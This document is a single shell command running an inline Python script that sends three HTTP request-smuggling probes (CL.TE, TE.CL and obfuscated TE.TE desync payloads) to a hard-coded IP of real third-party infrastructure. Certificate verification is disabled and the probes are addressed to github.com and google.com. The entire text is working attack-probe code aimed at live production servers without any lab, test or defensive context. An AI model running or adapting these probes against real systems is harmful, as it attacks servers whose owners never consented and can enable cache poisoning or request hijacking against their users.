python3 -c "
import socket, ssl

context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

# Test 1: CL.TE desync (Content-Length vs Transfer-Encoding)
# Front-end uses Content-Length, back-end uses Transfer-Encoding
req1 = b'POST / HTTP/1.1\r\nHost: github.com\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET http://google.com/ HTTP/1.1\r\nHost: google.com\r\n\r\n'

# Test 2: TE.CL desync
# Front-end uses Transfer-Encoding, back-end uses Content-Length
req2 = b'POST / HTTP/1.1\r\nHost: github.com\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5\r\nG\r\n0\r\n\r\n'

# Test 3: TE.TE (obfuscated Transfer-Encoding)
req3 = b'POST / HTTP/1.1\r\nHost: github.com\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: x\r\n\r\n0\r\n\r\nGET / HTTP/1.1\r\nHost: google.com\r\n\r\n'

tests = [
    ('CL.TE desync', req1),
    ('TE.CL desync', req2),
    ('TE.TE obfuscated', req3),
]

for name, req in tests:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect(('142.250.80.46', 443))
        ss = context.wrap_socket(s, server_hostname='github.com')
        ss.send(req)
        data = ss.recv(1024)
        status = data.split(b'\r\n')[0].decode('ascii', errors='replace')
        print(f'{name}: {status}')
        ss.close()
    except Exception as e:
        print(f'{name}: ERROR ({e})')
" 2>/dev/null
